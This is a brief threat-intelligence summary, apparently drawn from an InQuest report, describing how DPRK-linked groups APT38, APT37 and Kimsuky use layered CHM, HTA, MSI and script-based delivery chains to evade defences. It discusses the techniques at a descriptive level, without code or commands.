InQuest describes DPRK-linked threat actors as part of a broader shift toward evasive, multilayered file-borne intrusion chains in a post-macros threat landscape. The excerpt identifies APT38 as a DPRK-directed group pursuing high-yield financial theft operations against global financial, media, and technology targets, using trusted social media delivery and layered archives, CHM content, MSI files, and scripted backdoors. It also cites APT37 activity using CHM-to-HTA-to-PowerShell chains that lead to backdoors and information stealers against Asia, the Middle East, civil society, defense, and government targets. Kimsuky is described using CHM lures such as tax investigation forms and interview requests that unpack VBS, batch scripts, Base64-encoded content, PowerShell, downloaders, keyloggers, clipboard stealers, and data-exfiltration components. The main defensive point is that these DPRK-linked examples show multiple subgroups adapting delivery chains to bypass gateway, antimalware, and signature-based controls.